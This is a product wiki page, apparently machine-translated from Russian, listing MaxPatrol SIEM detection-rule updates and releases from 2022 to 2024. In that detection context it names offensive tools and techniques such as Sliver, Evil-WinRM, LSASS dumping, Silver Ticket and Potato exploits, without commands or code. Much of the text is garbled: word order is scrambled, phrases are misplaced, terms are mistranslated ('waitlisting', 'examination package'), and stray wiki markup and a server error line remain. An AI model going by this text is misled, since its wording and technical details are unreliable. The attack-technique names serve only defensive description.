[an error occurred while processing the directive]
RSS
Логотип
Баннер в шапке 1
Баннер в шапке 2

MaxPatrol SIEM

Product
Developers: Positive Technologies
Last Release Date: 2024/01/11
Technology: Information Security - Firewalls,  Information Security - Information Leakage Prevention,  Information Security System Information and Event Management (SIEM)

Content

The main articles are:


MaxPatrol - a system for monitoring security and compliance with standards developed by Positive Technologies, allows you to obtain an assessment of the security status of both the entire information system and individual departments, nodes and applications. Pentest, Audit, and Compliance mechanisms, combined with support for analyzing various operating systems, DBMS, and Web applications, enable MaxPatrol to provide continuous technical security audits at all levels of the information system. "

2024: Adding 62 Risk Detection Rules

MaxPatrol SIEM has added 62 risk detection rules. This was Positive Technologies reported on January 11, 2024. With their help, the event monitoring system INFORMATION SECURITY detects, among other things, activity encoders and even more signs of the tools working hacker. In total, the following examination packages were updated: "Attacks using specialized," "brute ON force attacks," "Investigation of the start of processes in," " Windows Network devices. Indicators of compromise, "tactics" Receiving credentials, "" data Execution, "" Detection prevention, "" Data collection, "" Destructive impact, "" Moving inside the perimeter, "" Securing, "" Privilege escalation, "" Management organization, "" Study. "

Cybercriminals do not stand still: every day they improve attack methods, develop new tools so that their actions remain unnoticed by the means of protection. Positive Technologies experts continuously monitor cyber attack trends, study specialized forums for the development and sale of malware and tools, and analyze public reports on incident investigation (including those issued by their own security expert center). Based on current data on how attackers attack, Positive Technologies regularly updates the expertise in MaxPatrol SIEM.

The most important rules in published updates allow MaxPatrol SIEM users to detect:

  • typical actions of ransomware, for example, mass generation of files or their modification by the same process;
  • additional signs of the activity of hacker tools previously covered with detections; among them, for example, PPLBlade, Powermad, NimExec and SharpHound, which is still actively used in attacks;
  • popular techniques "Loading third-party DLLs" (malicious ON APT groups and using it to penetrate the network and elevate privileges) and "Replacing the parent PID" (used by attackers to hide malicious actions by changing the parent of the process) tactics "Preventing detection" according to the MITRE ATT&CK matrix.

File:Aquote1.png
PT Expert Security Center investigation experience shows that incidents involving data encryption or data mashing at enterprise infrastructure nodes were among the most common in 2021-2023 (21% of cases). The top three are Black Basta, Rhysida and LockBit, and ransomware operators continue to expand their arsenal, "said Nikita Bazhenov, a junior specialist in the knowledge base and information security expertise of Positive Technologies. - Ransomware differs in that it quickly spreads from one node to others. With the updated examination package, MaxPatrol SIEM users will receive a signal about the first computer attacked by the ransomware. By removing the virus in a timely manner, they will be able to stop the attack at an early stage and promptly investigate the incident.
File:Aquote2.png

To start using the latest rules and event enrichment mechanisms, you need to upgrade MaxPatrol SIEM to version 7.0 or higher and install the review package updates.

2023

MaxPatrol SIEM 8.0

On October 26, 2023, Positive Technologies announced the release of the eighth version of the information security event monitoring and incident detection system MaxPatrol SIEM. The updated product will increase by almost a third the percentage of the vendor's presence among companies that require ultra-large installations (business from the RA600 list), and among government organizations that are tasked with using artificial intelligence technologies.

MaxPatrol SIEM 8.0

According to the company, among the key changes are reducing hardware requirements, optimizing system performance before processing more than 540,000 events per second, as well as increasing the volume or shelf life of data up to six times due to the use of proprietary DBMS - LogSpace.

The updated version of MaxPatrol SIEM significantly reduces the requirements for hardware resources: for example, now to deploy a system that processes up to 5 thousand events per second, you need half the number of processors (vCPU) and half the amount of RAM than before. This will allow companies to reduce the cost of purchasing equipment and facilitate the installation of the system. These are important parameters that are relevant for October 2023 for all domestic companies - due to the increase in cost and difficulties in buying equipment.

In addition, the performance of MaxPatrol SIEM has been optimized: on one core and using all expert rules, the updated product processes more than 540 thousand events per second. This achievement allows you to organize monitoring of large streams of events without degradation of the quality of the detector and without compromises when choosing examination packages. Increased performance enables effective cybersecurity for large georegulated infrastructures that integrate hundreds of MaxPatrol SIEM components into a single monitoring point.

MaxPatrol SIEM 8.0 has a ML behavioral analysis module - Behavioral Anomaly Detection (BAD), which allows you to identify attacks attackers using the tactics "Execution," "Control and Control," "Horizontal movement" on the MITRE ATT&CK model and confirm the actuation of the corresponding correlation rules. The ML module reduces the cognitive load of the SIEM analyst, allowing faster and more accurate decision-making on the information security incident . BAD works as a second opinion system. Built into the module are 38 machine learning models developed from Positive Technologies' twenty years of experience in incident investigation. BAD collects and analyzes data on events, users, processes in the context of events and assigns them a certain level of risk score.

File:Aquote1.png
The expert content of MaxPatrol SIEM 8.0 and the integration of the product with the behavioral anomaly detection module allows you to detect both known and poorly understood attacks and anomalies. Monitoring many geodistributed installations in a single window mode allows information security analysts to quickly respond even to such threats.

told Ivan Prokhorov, Head of Product MaxPatrol SIEM, Positive Technologies
File:Aquote2.png

Since version 7.0, the SIEM system supports the LogSpace event store, specially developed by Positive Technologies. In this release, by reducing the size of information security events arriving at MaxPatrol SIEM, it was possible to increase the volume or shelf life of data in LogSpace by six times compared to open source database management systems .

File:Aquote1.png
We see a demand from the market to reduce the requirements for the power of the used processors, the amount of RAM, as well as the disk space required to store events. The number of events that clients want to send to the SIEM system using the syslog protocol has increased many times. In addition, more and more companies with a large geographically distributed infrastructure are contacting us.

stated Roman Sergeyev, MaxPatrol SIEM Development Manager, Positive Technologies
File:Aquote2.png

A number of changes in MaxPatrol SIEM are aimed at optimizing the efficiency and convenience of information security analysts when investigating incidents. The updated event card is focused on the delivery of an additional related event information from third-party services (both internal Positive Technologies and external) and the ability to analyze incident-related events without changing context. Data from third-party services is grouped and presented in MaxPatrol SIEM within one screen - the user does not need to switch to other windows and scroll through the screen. Thus, the presence of context filters, built-in cross-service integration, updated search using PDQL requests and UX optimization allow the operator to process each cyber incident without changing the context up to two times faster than in the previous version of the product.

To optimize the hypothesis testing task, integration with Positive Technologies products and third-party services has been expanded: cross-service requests can now be sent from the event card to PT Network Attack Discovery, PT Endpoint Detection and Response (PT EDR), RST Cloud, Whois7 and other systems.

In addition, cross-service requests can be sent from the event card to the PTThreatAnalyzer subsystem. It helps build incident detection and prioritization based on compromise indicators - information about attackers and the tools they use to attack. PT Threat Analyzer collects threat data from various sources, including the PT Threat Intelligence Feeds service, as well as other commercial and open data sources.

Add 44 rules that profile user actions in the infrastructure

information security SIEM 44 additional correlation rules are available in the MaxPatrol event monitoring system that profile user actions in the infrastructure and identify atypical connections to corporate nodes and services. The product tracks access to computers to top management and developers, controllers,, domains to servers Gitlab managers passwords and other applications. The company Positive Technologies announced this on August 22, 2023.

File:Aquote1.png
Our experience in conducting cyber exercises has shown that profiling access to critical nodes is the only way to detect authorization in corporate services from previously unknown IP addresses and devices and prevent attack at an early stage leak if a accounting dump appears on the network. data Such deviations, as a rule, indicate that the employee's account has been seized, cybercriminals remotely connected to the infrastructure and moved inside it, - said Kirill Kiryanov, head of the endpoint attack detection group, Positive Technologies. - With this examination package, MaxPatrol SIEM operators were able to catch atypical activity, which may seem legitimate in general terms, but be abnormal for a specific infrastructure, which means it poses a security threat.
File:Aquote2.png

With the help of the added rules, the product analyzes user authorization at target infrastructure nodes and in various applications, including GitLab servers, 1C products, password managers and domain controllers, as well as computers of top managers, developers and other critical users, the seizure of which may allow attackers to implement unacceptable events for the company.

A total of three profiling modes have been implemented:

  • passive collection of information about which corporate services each employee uses (does not provide for the activation of correlation rules);
  • automatic profiling and login notification: MaxPatrol SIEM notifies you of new authorizations in corporate services and remembers the combinations "device IP address and user name" (hereinafter, the operator is not informed about these events);
  • strict profiling: the collection of data on user actions in the infrastructure is completed, the SIEM system instantly notifies the information security analyst of any access that deviates from the norm.

Data for compiling profiles comes from application software logs, as well as from auditd and Windows Security logs from specific sites. MaxPatrol SIEM is based on security asset management technology, which collects data on all assets and makes the IT infrastructure transparent to the operator. The product can automatically identify critical servers in the infrastructure and profile user access to them. Or the information security analyst can manually add nodes to the table, the references to which it is important for him to track.

The activity profiling feature is available in MaxPatrol SIEM version 7.0 and later.

In addition, expertise packages have been updated in MaxPatrol SIEM to identify attacks on the MITRE ATT&CK matrix. In particular, Positive Technologies experts have developed rules for detecting a dump of the LSASS process, which uses the hacker utilities PPLMedic and PPLFault, popular among cybercriminals, as well as an enrichment rule for decrypting Base64 in launch lines - its encoding helps attackers hide their actions.

Add an Expert Review Package to Identify Supply Chain Attacks

Another expertise package for MaxPatrol SIEM allows companies to prevent the implementation of threats related attacks to (supply chains supply chain). Such attacks are aimed at developers suppliers through software whose products cybercriminals access the infrastructure of the ultimate goal. This was announced on July 28, 2023 by the company. Positive Technologies

According to the Positive Technologies Security Center (PT Expert Security Center, PT ESC), 20% of all recorded attacks in 2022 are supply chain and trusted relationship attacks (through trust); the resources of well-known organizations were affected - AMD, Cisco, Cloudflare, Microsoft, Nvidia, Samsung. And in the first six months of 2023, such attacks accounted for about 30% of cases.

File:Aquote1.png
For software vendors, the implementation of supply chain threats is unambiguously an unacceptable event. This is relevant for us and for many other IT companies, "said Danil Zaripov, an expert at the PT Expert Security Center. - Such incidents can lead to reputational and financial costs, to the termination of contractual obligations with customers, to the theft of the developer's intellectual property.
File:Aquote2.png

The examination package added to MaxPatrol SIEM is based on three main sources of events, usually closely related to each other: on the Gitlab repositories, the TeamCity assembly infrastructure, and on the JFrog Artifactory artifact and data repository. The rules identify, in particular, adding code to an important branch without approval, changing such a branch through the web interface and removing protection from it, approving your own request for adding code, mass creation of privileged accounts, suspicious actions of new users, changing the configuration of the TeamCity assembly, actions in JFrog Artifactory indicating an attack like dependency confusion (CVE-2021-29427). Such activity can lead to an illegitimate change in the code stored in protected, release or main (master) branches.

The MaxPatrol SIEM rules cover the following MITRE ATT&CK matrix techniques: supply chain compromise ("Initial Access" tactic), existing accounts ("Initial Access" and "Privilege Escalation" tactic), data from the local system ("Data Collection" tactic), and deface ("Impact" tactic).

Add 70 rules to detect Unix infrastructure attacks

MaxPatrol SIEM has received more than 70 rules for detecting attacks on Unix infrastructures. This was announced on July 10, 2023 by Positive Technologies.

In total, the MaxPatrol SIEM information security event monitoring system has received more than 100 new threat detection rules as part of the update of examination packages, of which over 70 are focused on detecting attacks on Unix infrastructures. The added rules improve the accuracy of detecting brute-force attempts, as well as attacks on Unix operating systems.

To help government agencies, entities CUES and domestic companies with Unix infrastructure ensure its security, Positive Technologies experts have added ways to detect current threats in MaxPatrol SIEM. The rules loaded into the product allow you to more accurately identify the use of MITRE ATT&CK matrix techniques that are used by cybercriminals to obtain credentials data (credential access), initial access and movement within the perimeter (lateral movement), detection prevention (evasion), research and data collection (discovery and collection), persistence and privilege escalation, execution, and interaction with command and control.

In addition, as part of the MaxPatrol update, SIEM was replenished with rules for detecting attempts to hack accounts by selecting a login and. In password particular, now the product separately distinguishes attempts at spraying (matching one password to many accounts; attackers do this to avoid blocking accounts). At the same time, each search rule is tied to a specific application, operating system or network device. Among them, for example, are, the IIS firewall Cisco web server, the application and. OpenVPN Gitlab

Unix is the basis of several dozen operating systems, including Linux. Most web servers, cloud services, and popular virtualization tools run on Unix systems. Taking into account import substitution in Russia, the demand for such operating systems, as well as the number of cyber attacks on them, will grow.

File:Aquote1.png
With the added rules, MaxPatrol SIEM identifies successful credential matching cases. If, as a result of brute force, the attackers managed to find the correct login and password, this is a critical incident that requires a lightning-fast response from an information security specialist. The speed of the operator's reaction depends on whether the attacker will have time to develop the attack and get to the system of interest to him, "said Yulia Fomina, lead specialist in the endpoint attack detection group, PT Expert Security Center.
File:Aquote2.png

integration MaxPatrol SIEM has expanded with a behavioral traffic analysis system - PT Network Attack Discovery now users will be able to see even more correlations (more than 3.5 thousand) of the SIEM system to critical rules from PT NAD. This allows you to reduce the number of false positives and increase the accuracy of detecting suspicious network activity. In addition, with the updated examination package, companies using both of these products can create subnet whitelists and automatically disable rule triggering for different groups of dynamically issued IP addresses. For example, you can use waitlisting for - R&D nets or networks of scanners vulnerabilities when the company is in internal development.

Add event enrichment mechanisms

INFORMATION SECURITY The company's event monitoring system - Positive Technologies MaxPatrol - SIEM has added risk detection rules. Additional mechanisms for enriching events have appeared: they help information security analysts confirm up to 90% of incidents without an additional request. data PT announced this on May 30, 2023. Now MaxPatrol SIEM detects on attacks the domestic, DBMS ClickHouse as well as signs of the work of five more popular hacker tools - Sliver, NimPlant, Masky, PowerView and Evil-WinRM.

Positive Technologies specialists are constantly investigating new cyber threats, monitoring the activity of hacker groups around the world, studying their tactics and techniques. Based on this data, experts create ways to identify threats that are regularly transmitted to MaxPatrol SIEM as examination packages. Thanks to this, SIEM users can detect current threats and quickly respond to the actions of cybercriminals who are continuously developing new attack tools, methods and techniques, as well as improving previously created ones.

Positive Technologies experts have developed mechanisms for enriching information security events for MaxPatrol SIEM. These mechanisms independently search for dynamic data that arise when an attack develops in order to provide information security analysts with the full context of the processes being launched (previously, MaxPatrol SIEM implemented a mechanism for automatically building process chains).

File:Aquote1.png
Additional context in MaxPatrol SIEM helps detect malicious activity. The more context in the event cards, the easier it is for information security specialists to "spin" attacks. The mechanism for building chains of launched processes we added earlier removed most of the routine tasks from SOC analysts, so we continued to work in this direction, "said Kirill Kiryanov, head of the endpoint attack detection group, Positive Technologies. - To make incident investigation even easier, faster and more efficient, we have created additional enrichment mechanisms. They provide an extended context that helps operators verify up to 90% of incidents, thereby eliminating the need to make additional requests in the system.
File:Aquote2.png

The company's experts have updated previously downloaded packages to identify hacker tools and disguise methods. The rules added to MaxPatrol SIEM allow you to detect the work of the increasingly popular Sliver and NimPlant tools, attempts to exploit ProxyNotShell vulnerabilities with the malicious Metasploit module, as well as the activity of the Masky, PowerView and Evil-WinRM frameworks, which are still part of the arsenal of cybercriminals.

With the added rules, MaxPatrol SIEM also detects advanced techniques for hiding attackers in the infrastructure, in particular:

  • running processes without an extension - used to bypass correlation rules that take into account an explicit search for processes with an.exe extension, as well as for masking;
  • starting processes with a double extension, for example.docx.exe, - attackers use this method when phishing;
  • loading processes or libraries signed by a Microsoft certificate that does not have valid signature status - in this way, attackers try to disguise their tools as legitimate Microsoft programs.

As part of a large-scale review update, the product also received a package of rules that allow detecting suspicious activity in the domestic ClickHouse database management system. The package includes more than 20 correlation rules that will help quickly detect an attack at various stages - from reconnaissance to attempts to unload data from the DBMS or destroy it. The added expertise will help Russian companies using ClickHouse or planning to switch to it as part of import substitution to ensure the security of critical data. Previously, MaxPatrol SIEM loaded rule sets to detect attacks on PostgreSQL, Oracle Database, Microsoft SQL Server and MongoDB.

To start using the new rules and event enrichment mechanisms, you need to upgrade MaxPatrol SIEM to version 7.0 and install review package updates.

Add more than 70 rules to monitor information security events on resources in Yandex Cloud

MaxPatrol SIEM has expanded integration Yandex Cloud with and service for collecting and unloading audit logs from clouds Yandex Audit Trails. The company Positive Technologies announced this on April 13, 2023. The first examination package to identify suspicious activity on resources hosted by users in Yandex Cloud was added to MaxPatrol SIEM in 2022. Updates to this package are now loaded in MaxPatrol SIEM. Updates include over 50 event normalization rules and 20 correlation rules. Now the updated package contains more than 100 rules. This will support even more audit security events in Yandex Cloud, whose services are used daily by over 24 thousand companies.

The added correlation and normalization rules allow you to detect early attempts by attackers to gain illegitimate access to resources hosted on the cloud platform. The rules help information security specialists navigate the rich flow of events, and the MaxPatrol SIEM interface allows you to monitor the status of detected threats in one-stop mode. This helps improve security when using Yandex Cloud services.

File:Aquote1.png
The list of rules was developed with the expert support of Yandex Cloud specialists, taking into account their recommendations for choosing security events. One of the key changes that came with these updates is native support for Kubernetes logs, which will more accurately detect attempts to compromise cloud environments, "said David Nikachadze, specialist in the knowledge base and information security expertise department, Positive Technologies.
File:Aquote2.png

Using the rules added to the examination package, MaxPatrol SIEM detects:

  • In Yandex, Managed Service for Kubernetes is an illegitimate connection from an external address to the Kubernetes cluster. This may be an attempt to gain access to cloud resources by attackers. You can find out more about the recommendations for configuring security in the service here.
  • Yandex Resource Manager - illegitimate assignment of administrative rights to access a directory or cloud.
  • In Yandex Cloud Organization - illegitimate assignment of the right to manage membership in IAM groups.
  • In Yandex, Virtual Private Cloud is the assignment of an unsafe access control list to a security group, which can expose the infrastructure to the risk of compromise.
  • Yandex Virtual Private Cloud creates a public IP address without protection against DDoS attacks, which makes services vulnerable to denial-of-service attacks.
  • In management services for various databases, logging in the cluster is disabled, which may indicate an attempt to hide actions by an attacker.
  • Create resources (such as virtual machines, database clusters, Kubernetes clusters, application balancers) without using security groups. Such actions can be invalid events and indicate that there is no rule for receiving and sending traffic.

To start using the new rules, you need to update MaxPatrol SIEM to version 7.0, install the update of the examination packages by following the instructions for configuring the collection of Yandex Cloud and Kubernetes events.

Mechanism for automating the construction of chains of started processes

On February 28, 2023, the company Positive Technologies announced an updated MaxPatrol expertise package, SIEM which includes a mechanism for building chains of launched processes, which saves to analysts INFORMATION SECURITY up to 5-10 minutes on analyzing the response of each correlation rule. The mechanism developed by Positive Technologies experts automatically enriches the correlated event, which contains the name and identifier of the process, with its full chain. An additional context to help detect malicious activity is displayed in the event card.

MaxPatrol SIEM

As reported, in SIEM systems, a large number of detection rules are based on events in which there is information about the start of the process. When verifying triggers, operators spend a lot of time "unwinding" the chains of started processes. In addition to the most suspicious process, they also analyze those that gave birth to it and launched in the future.

The updated mechanism in MaxPatrol SIEM automates process chain tasks. If earlier the operator had to make about five to six requests in the SIEM system in order to find out the sequence of starting related processes, then by February 2023 the chains are collected automatically and displayed in a special field in the event card.

The product detects suspicious activity initiated by messengers (Telegram, Skype, WhatsApp, Microsoft Teams), web servers, Microsoft Office applications, antivirus programs such as Kaspersky Security Center, and SCCM agents that provide centralized configuration management in the IT infrastructure.

In addition, Positive Technologies experts have updated the examination packages for detecting attacks using the MITRE ATT&CK model. The rules added to MaxPatrol SIEM allow you to identify:

  • using LSASS Shtinkering techniques (LSASS process memory dump method using Windows Error Logging Service) and Dirty Vanity (code injection method for bypassing endpoint security). Malicious techniques appeared in the arsenal of attackers in December 2022;
  • operating vulnerabilities algorithm enciphering in RC4, which allows you to remotely access the system or execute code, as well as exploiting a family of forced vulnerabilities that authentications allow you to obtain an NTLM hash of a Windows service account.

File:Aquote1.png
The examination packages loaded into MaxPatrol SIEM earlier are updated with rules as various attack methods emerge. Positive Technologies experts continuously analyze current cyber threats and develop rules for detecting tactics, techniques and methods of exploiting vulnerabilities that the attackers have just adopted. In addition, some long-known vulnerabilities in the RPC service related to coerced authentication have not been officially recognized as vulnerabilities and will not be fixed by Microsoft, and the updated package will help information security specialists detect attempts to exploit them and take action in time.

noted Kirill Kiryanov, Head of Endpoint Attack Detection at Positive Technologies
File:Aquote2.png

To start using the mechanism for building chains of started processes, you need to update MaxPatrol SIEM to version 7.0 and install an updated examination package.

Add four packages to identify attacks on the domain infrastructure

information security SIEM New detection rules have been loaded into the MaxPatrol event monitoring system. attacks The company Positive Technologies announced this on January 27, 2023. The updates received four packages of expertise: "Attacks on," " Microsoft Active Directory Tactics" Elevation of privileges "and" Management organization "()," "Attacks MITRE ATT&CK with the help of specialized" and " ON Tactics" Consolidation "(MITRE ATT&CK)."

As part of the update, 31 rules were added to MaxPatrol SIEM. {{quote "The most important rules in the published updates are perhaps related to the detection of attacks on Microsoft Active Directory," said Yulia Fomina, senior specialist in the attack detection department, Positive Technologies. - Companies face such threats every day, they are actively used by attackers. The update also includes rules for identifying those techniques that have been used by attackers for a long time and do not lose their relevance. }}

The review package updates downloaded into MaxPatrol SIEM will help you identify:

  • Attacks on Microsoft Active Directory that allow attackers to gain maximum rights in the domain infrastructure. Microsoft Active Directory problems are exploited by attackers in real life, in particular, since the spring of 2022, attacks have been carried out on the Active Directory Certificate Services (AD CS). Attackers can be exploited even with installed patches if the certificate templates are configured incorrectly. New rules identify similar attacks at all stages: incorrect configuration of templates, operation and subsequent use of the received certificate for further horizontal movement through the infrastructure.
  • Exploitation of the Kerberos Relay vulnerability in Microsoft Active Directory. This vulnerability exploits the features of the Kerberos domain authorization protocol to increase rights on any domain computer (from an unprivileged account to system rights) and gain a foothold in the system. Two new rules are loaded in MaxPatrol SIEM to detect this activity.
  • Classic Silver Ticket attack on the Kerberos protocol. To detect such attacks, a rule with a new detection method was added to the system: according to the results of a number of red team projects and pentests, Positive Technologies experts found certain anomalies in user authorizations using the Kerberos protocol.
  • Exploitation of a well-known series of vulnerabilities called Potato Vulnerabilities: Juicy Potato, MultiPotato, Remote Potato, Rogue Potato is one family of vulnerabilities whose exploitation allows attackers to elevate privileges from a service account to system rights.

· Token manipulation to elevate privileges in the system. · Exploitation of vulnerabilities in the Windows printing service (CVE-2022-21999 and CVE-2022-30206) that allow attackers to elevate privileges. · Using the classic method of elevating privileges to the system level if you have local administrator rights - elevating through named pipes. This default attack method is offered by frameworks such as Cobalt Strike, Metasploit, Empire.

To begin using this examination package, you must upgrade MaxPatrol SIEM to versions 7.0 or 7.1 and set the rules from the examination package.

Compatibility with "Kvant-CHEAZ" software and hardware

information security The MaxPatrol event monitoring system SIEM and the software and hardware complex "" KVANT-CHEAZ(CAS "QUANTUM") CHEAZ passed compatibility tests. This was announced on January 10, 2023 by the company. Positive Technologies MaxPatrol SIEM provided monitoring of KVANT-CHEAZ software and hardware complex and detection of information safety incidents. CAS "KVANT-CHEAZ" performed all functions in accordance branch with the requirements APCS for exchange time data and commands, absence of failures, failures and loss of transmitted data. More. here

2022

Examination package with mechanism for automatic exclusion of false positives of correlation rules

The updated MaxPatrol SIEM examination package (information security event monitoring and incident detection system) has included automatic waitlisting - a mechanism for automatically excluding false positives of correlation rules. By optimizing routine tasks, information security analysts can save up to 250 man-hours per week when analyzing positives and selecting real incidents, as well as quickly adapt the SIEM system to their infrastructure during implementation. This was announced on December 14, 2022 by Positive Technologies.

{{quote "There are countless programs running in infrastructures, and ordinary users take millions of actions every day that information security products need to distinguish from the activity of cybercriminals. In this case, any means of protection can generate false positive positives, that is, erroneously recognize the activity as illegitimate. The need to work with false positive is a well-known fact faced by users of various information security products, including SIEM systems. So, according to a survey by the Center for Long-Term Cybersecurity, 36% of specialists note that they receive too many false positives when using ATT&CK frameworks. As a result, analysts have to process the triggering of correlation rules and manually weed out false positive. This is a labor-intensive process: due to the large number of false positive, the risk of missing a cyber attack increases, - said Yulia Fomina, senior specialist in the expert services and development department of SOC, Positive Technologies. - A mechanism has been added to MaxPatrol SIEM that allows you to automatically add legitimate repeating activity to exceptions. }}

Only identified event keys that have been detected repeatedly are whitelisted. After that, MaxPatrol SIEM considers the activity typical for a specific infrastructure and no longer generates a response. Among the specially undetected events can be, for example, the background activity of the operating system, the operation of administration scripts, the regular start of processes on a schedule, in particular, checking the infrastructure with security scanners or the work of assembly agents.

Automatic waitlisting also provides for cases with repeated incidents of a complex nature, for example, in internal systematic violations of information security policy. First, the mechanism marks alarms up to five times as possible false positives, placing them in the temporary tabular list intended for this, the SOC operator should blacklist such events according to one or more criteria (node name, user name or trigger key).

In addition, MaxPatrol SIEM still has the ability to add exceptions using templates prepared by Positive Technologies experts. Templates are a mechanism that allows an operator to click from an event card to enter certain fields into tabular lists for waitlisting, blacklisting, identifying compromise indicators, and more.

File:Aquote1.png
In order for the security tool to adapt to the features of the infrastructure, when implementing SIEM systems, analysts have to manually write exceptions for correlation rules for several months, "said Petr Kovchunov, specialist in the knowledge base development department, Positive Technologies. - In MaxPatrol SIEM, you can enable automatic waitlisting, which will identify the same type of and repeated activities, recognize them as natural for your infrastructure and stop notifying operators about them. The mechanism we developed increases the efficiency of MaxPatrol SIEM and, as a result, allows you to unload analysts. They can devote the free time to those tasks where experts cannot be replaced, for example, proactive search for threats and investigation of incidents.
File:Aquote2.png

To start using automatic waitlisting, you need to upgrade MaxPatrol SIEM to version 7.0 and install an updated examination package.

Examination package to identify suspicious activity in resources posted on Yandex Cloud services

On December 1, 2022 , Positive Technologies announced that an expertise package has been added to the MaxPatrol SIEM information security event monitoring system to identify suspicious activity in resources hosted by users in Yandex Cloud services. Rules uploaded to the system allow you to detect early attempts by attackers to violate the privacy, integrity and availability of data stored on the cloud platform.

MaxPatrol SIEM

According to the company, as of November 2022, more than 19 thousand companies use Yandex Cloud services every day. The public cloud platform provides corporations, midsize businesses , and private developers with scalable infrastructure,, tools, and storage services machine learning. As  development tools part of the course on import substitution Russian business, which previously used foreign cloud services, actively transfers resources, development and operation of internal and client applications in Yandex Cloud.

In September 2022, Positive Technologies specialists developed an integration module (connector) for MaxPatrol SIEM. It uploads data to the system about events that occur with resources that companies place in Yandex Cloud. The next stage of cooperation with the cloud platform was the release of an expertise package. It includes 17 rules detection of suspicious activity for the most popular services. In particular, for Compute services Cloud (virtual machines and disks), Object Storage (scalable data storage), Key Management Service (key management enciphering), Identity and Access Management (identification and control of access to cloud resources), Yandex Lockbox (creation and storage of secrets in the platform infrastructure), as well as services for management databases (,,,, ClickHouse MongoDB Redis MySQL). PostgreSQL

File:Aquote1.png
Companies in Russia are increasingly choosing cloud platforms, which creates the need to pay attention to any atypical activity associated with the resources placed there. Leakage, loss of data availability and the spread of malware through public resources are business risks, the possibility of which, based on the attack vector, may also depend on platform users. The expert package includes rules to help identify suspicious activity in popular Yandex Cloud services. In addition, we have developed rules for MaxPatrol SIEM that detect suspicious activity related to accounts on the entire platform for all incoming events in MaxPatrol SIEM. To detect potentially dangerous activity, information security event enrichment mechanisms with relevant data and tabular lists are used.

told David Nikachadze, specialist of the knowledge base and expertise department of information security, Positive Technologies
File:Aquote2.png

With updated rules, MaxPatrol SIEM detects:

  • For the Object Storage service:
    • illegitimate provision of public access to storage objects - buckets (violates the confidentiality of resources placed on the platform and may indicate that attackers use this access to download malware and other destructive actions).

  • For management services of various databases (ClickHouse, PostgreSQL, MySQL, MongoDB, PostgreSQL, Redis):

    • creating a database cluster by a user who is not in the list of administrators (may indicate malicious activity on the system).

  • For Identity and Access Management:

    • suspicious activity of privileged accounts that have access to all resources (a critically dangerous event that may indicate the presence of intruders on the system);
    • activity of service accounts from the range of IP addresses outside the cloud (may be one of the signs of infrastructure compromise).

  • For the Compute Cloud service:

    • creating a virtual machine with an already used IP address (in this way, attackers, as a rule, hide their presence in the system or collect confidential data by intercepting network traffic);
    • detection of sensitive information in user metadata when creating a virtual machine (is a clear violation of data privacy and can lead to its leakage);
    • illegitimate provision of access to a serial console to a virtual machine (rarely used in legitimate scenarios, so each such case requires additional verification and investigation);
    • assigning a service account that has access to Yandex Lockbox service secrets to a virtual machine (indicates incorrect delimitation of resource access rights, which is fraught with data leakage).

Loading the examination package to identify 13 malefactors' activities

The company Positive Technologies announced on October 28, 2022 that information security an examination package had been loaded into the MaxPatrol SIEM event monitoring system. The rules added to the system allow you to identify 13 activities malefactors related to the application (harmful ON HVE). Event sources for MaxPatrol SIEM can be common, means of protection such as sandbox, PT Sandbox Defender, Windows and products.Kaspersky Lab Dr.Web

Illustration: securitylab.ru

With these rules, based on PT Sandbox verdicts and antivirus software triggers, the SIEM system correlates potentially dangerous incidents, and also additionally focuses on users. The added capabilities help information security specialists navigate a huge stream of events and monitor the status of detected threats in "one window" mode - the MaxPatrol SIEM interface.

File:Aquote1.png
Encoders, bootloaders, bank trojans and other malware are the scourge of companies. According to to data Positive Technologies, in the second quarter of 2022, attackers attacked every second organization using malware. Antiviruses and sandboxes such as PT Sandbox, for example, effectively detect malware. In order for information security specialists to quickly identify complex ones, the attacks MaxPatrol SIEM interface now displays critical incidents with HVE generated by correlation rules. This helps the operator understand which cases should be thoroughly investigated,
commented Konstantin Grishchenko, head of information security monitoring at Positive Technologies.
File:Aquote2.png

In addition, the integration with PT Sandbox has been expanded. Analyzing the verdicts of the Positive Technologies sandbox, MaxPatrol SIEM now determines:

  • malicious files - the decision is made based on the results of all PT Sandbox checks;
  • running malicious files;
  • suspicious mail activity (detection of spam mailings by sender, headers and attachments).

The rules added to the examination package reveal, for example, the following activities:

  • ESR detected and removed (or not removed) within five minutes;
  • Windows Defender is disabled;
  • Kaspersky Endpoint Security is prohibited from launching a malicious application;
  • Kaspersky Endpoint Security has stopped or disabled its security components;
  • The Kaspersky Security Center installation packages have been modified.

To start using the examination package, you need to update MaxPatrol SIEM to version 7.0 and set the rules from the examination package.

Yandex Cloud Integration

The MaxPatrol SIEM system was integrated Yandex Cloud service with and to collect and unload audit logs from clouds Yandex Audit Trails., and Positive Technologies  cloudy platform specialists have developed a connector uploading to MaxPatrol SIEM data about events occurring with resources that organizations place in. Yandex Cloud Positive Technologies announced on September 29, 2022.

File:Aquote1.png
The need for this integration was indicated by MaxPatrol SIEM users who placed their cloud resources in foreign services Amazon and, and Microsoft recently time transferred them to Yandex. At the Cloud same time, the need to analyze all events safety in the cloud remained. And they turned to Positive Technologies with a proposal to develop an integration module, which was done, "
noted Dmitry Orkin, Head of Cloud Security at Yandex Cloud.
File:Aquote2.png

Illustration: securitylab.ru
File:Aquote1.png
If an organization takes out some of the resources in Yandex Cloud, it has to monitor what is happening to them from a security point of view. For example, if a company was attacked from the inside and the malware was embedded in its cloud, MaxPatrol SIEM can look at the entire sequence of actions of the attacker both inside the perimeter and in the resources deployed in Yandex Cloud. MaxPatrol SIEM users can write correlation rules on the events they receive from the cloud.
told Roman Sergeyev, Development Manager MaxPatrol SIEM, Positive Technologies.
File:Aquote2.png

Yandex Audit Trails, which accumulates audit logs for sending to MaxPatrol SIEM, is at the preview stage for September 2022 and is a free service. The user can choose from which resources in the cloud to collect logs, and configure the upload of audit logs to the encrypted bucket for storage and subsequent analysis. Among the types of events registered in the Yandex Audit Trails service are the creation and deletion of service accounts, changing user roles, creating and deleting resources, changing their parameters, access policies, security groups.

File:Aquote1.png
The compatibility of MaxPatrol SIEM with Yandex Cloud will be of interest to users of both products, in particular companies in the field retail and, in e-commerce, power industries manufacturers of medicines and, to pharmacies developers of digital products and solutions. Yandex Cloud is one of the big cloud ones. providers Clouds are the direction of development, and cyber security the company considers Yandex Cloud one of the technology partners in this area,
commented Anton Alexandrov, Head of Business Development at Positive Technologies.
File:Aquote2.png

Integration with Yandex Cloud is available starting with MaxPatrol SIEM 7.0.

Adding 42 Rules to Previously Loaded Examination Packages

